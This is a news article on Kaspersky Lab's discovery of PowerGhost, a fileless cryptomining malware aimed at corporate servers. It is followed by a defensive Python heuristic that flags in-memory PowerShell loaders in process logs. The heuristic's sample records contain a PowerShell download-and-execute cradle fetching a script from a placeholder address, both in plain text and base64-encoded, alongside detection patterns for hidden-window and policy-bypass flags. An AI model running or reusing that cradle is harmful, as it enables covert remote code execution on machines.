New Fileless Crypto Mining Malware Targeting Corporate Servers, Says Kaspersky Lab
A new cryptojacking malware that targets corporations in multiple countries, mostly in Latin America, has been uncovered by Kaspersky Lab, an international software security group.
Dubbed PowerGhost, the crypto mining malware mines new coins using the computing power of victim PCs and mobile devices. It is distributed within corporate networks, infecting both workstations and servers. To make detection and remediation harder, the mining malware does not store its body directly on disk. PowerGhost uses multiple fileless techniques to discreetly gain a foothold in corporate networks. According to Kaspersky, the main victims of this attack so far have been corporate users in Brazil, Colombia, India, and Turkey.
“Machine infection occurs remotely through exploits or remote administration tools,” the security group said. “When the machine is infected, the main body of the miner is downloaded and run without being stored on the hard disk. Once this has happened, cybercriminals can arrange for the miner to automatically update, spread within the network, and launch the crypto-mining process.”
Vladas Bulavas, malware analyst at Kaspersky Lab, said that PowerGhost attacks on businesses, for the purpose of installing miners, raise new concerns about crypto mining software.
“The miner we examined indicates that targeting users is not enough – cybercriminals are now turning their attention to enterprises too,” said Bulavas. “And this makes cryptocurrency mining a threat to the business community.”
Earlier this month, cybersecurity firm McAfee reported that crypto mining malware grew by 629 percent in Q1 2018, rocketing from around 400,000 total known samples in Q4 2017 to over 2.9 million the next quarter. Crypto mining malware has also replaced ransomware as the main type of malicious software because of its high-profit opportunity and low chance of being discovered.
To reduce the risk of infection, Kaspersky Lab has advised companies to educate their employees and IT teams and to keep sensitive data separate. They should also use a dedicated security solution that includes application control, behaviour detection, and exploit prevention components, which monitor the suspicious actions of applications and block malicious file executions.
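The fileless behaviour described earlier (the miner body fetched and run without being written to disk, with machines reached through exploits or remote administration tools) and the behaviour-detection advice in the paragraph above suggest a defender-side illustration. The code below is an added example, not code from Kaspersky Lab or from the PowerGhost analysis: a heuristic that scores process-creation records for signs of in-memory script loading. It assumes a log source that records each new process with its parent image and full command line (Sysmon Event ID 1 or Windows event 4688 with command-line auditing carry these fields); the sample records, indicator weights and alert threshold are constructed for the demonstration and are not derived from PowerGhost samples.

```python
"""Heuristic triage of process-creation telemetry for fileless in-memory loaders.

Added illustration, not Kaspersky Lab's or PowerGhost's code. Assumes a log
source that records parent image and full command line for each new process.
All records, weights and the threshold below are constructed assumptions.
"""
import base64
import re

# Weighted indicators of a script engine being used to fetch and run code
# without writing it to disk. Weights are illustrative assumptions.
INDICATORS = [
    (re.compile(r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden", re.I), "hidden window", 1),
    (re.compile(r"(?:^|\s)-(?:ep|exec|executionpolicy)\s+bypass", re.I), "execution policy bypass", 1),
    (re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I), "encoded command", 1),
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), "in-memory expression evaluation", 2),
    (re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient", re.I), "download cradle", 2),
]

# Parent images that indicate a remote launch (WMI, remote service execution).
SUSPICIOUS_PARENTS = {
    "wmiprvse.exe": ("launched via WMI", 2),
    "psexesvc.exe": ("launched via remote service", 2),
}

ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
ALERT_THRESHOLD = 4  # constructed cut-off; tune against your own baseline


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 over UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def score_event(event):
    """Score one process-creation record; returns (score, list of matched reasons)."""
    reasons, score = [], 0
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + "\n" + decoded  # scan the decoded payload as well as the raw line
    for pattern, label, weight in INDICATORS:
        if pattern.search(text):
            reasons.append(label)
            score += weight
    parent = event.get("parent", "").lower()
    if parent in SUSPICIOUS_PARENTS:
        label, weight = SUSPICIOUS_PARENTS[parent]
        reasons.append(label)
        score += weight
    return score, reasons


def flag_events(events, threshold=ALERT_THRESHOLD):
    """Return the records whose score reaches the alert threshold."""
    return [e for e in events if score_event(e)[0] >= threshold]


def _encode_ps(command):
    """PowerShell expects -EncodedCommand as base64 over UTF-16LE text."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed sample records (hosts, parents and the TEST-NET address are placeholders).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/m.ps1')"
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Reports"},
    {"host": "ws02", "parent": "wmiprvse.exe",
     "cmdline": 'powershell.exe -nop -w hidden -ep bypass -c "' + _CRADLE + '"'},
    {"host": "srv01", "parent": "services.exe",
     "cmdline": "powershell.exe -w hidden -enc " + _encode_ps(_CRADLE)},
    {"host": "srv02", "parent": "taskeng.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        total, why = score_event(ev)
        print(f"{ev['host']:6} score={total:2} {'ALERT' if total >= ALERT_THRESHOLD else 'ok   '} {why}")
```

Two points the records make: the encoded-command form carries the same download-and-execute behaviour as the plaintext one but hides every string a naive match would rely on, so decoding `-EncodedCommand` before scoring is what lets the `srv01` record be caught; and a scheduled backup script that merely bypasses the execution policy stays below the threshold, which is the kind of benign-but-noisy event a weighted scheme tolerates better than single-indicator rules. Heuristics like this complement, rather than replace, the application control and exploit prevention the article recommends.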